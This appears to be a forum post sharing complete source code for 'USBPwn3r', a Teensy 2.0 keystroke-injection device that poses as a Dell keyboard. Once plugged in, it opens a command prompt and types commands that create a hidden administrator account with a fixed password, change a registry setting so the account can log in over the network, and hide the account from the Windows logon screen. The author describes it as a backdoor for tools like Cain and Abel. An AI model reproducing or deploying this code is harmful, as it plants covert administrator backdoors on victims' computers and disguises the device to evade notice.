I used your library in my first ducky I dubbed the USBPwn3r:
Flickr Photo Set
Code:
/*
The following is Jon Marler's USBPwn3r proof-of-concept device for Teensy 2.0
Uses the PHUKD library from:
http://www.irongeek.com/i.php?page=securit...eystroke-dongle
To learn more about Teensyduino see:
http://www.pjrc.com/teensy/teensyduino.html
Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions
Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID
Compile Notes: Make sure you set the correct board type under Tools->Board, and the correct Tools->USB type as well
*/
#include "phukdlib.h"
// The setup() method runs once, when the sketch starts
void setup() {
delay(20000);
CommandAtRunBarMSWIN("cmd");
delay(500);
Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v forceguest /t REG_DWORD /d 00000000 /f");
Keyboard.println("cls");
Keyboard.println("NET USER IUSR_ADMIN P4ssw0rd! /ADD /active:yes /fullname:\"Built-in admin\" /expires:never /times:all");
Keyboard.println("cls");
Keyboard.println("NET LOCALGROUP Administrators IUSR_ADMIN /ADD");
Keyboard.println("cls");
Keyboard.println("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v IUSR_ADMIN /t REG_DWORD /d 00000000 /f");
Keyboard.println("exit");
}
// the loop() method runs over and over again, checking for events
void loop()
{
}
The 20 second delay is to allow for windows to add the device and activate it. I also modified the teensy header files to use "Dell Keyboard" as the USB descriptor and changed the USB Vendor and Product ID's to match a Dell Keyboard.
The code is simple. It adds an administrator, and enables network login over the network for tools like Cain and Abel among others.
Using the PHUKD library made the code dead simple and easy to write. Thanks Irongeek!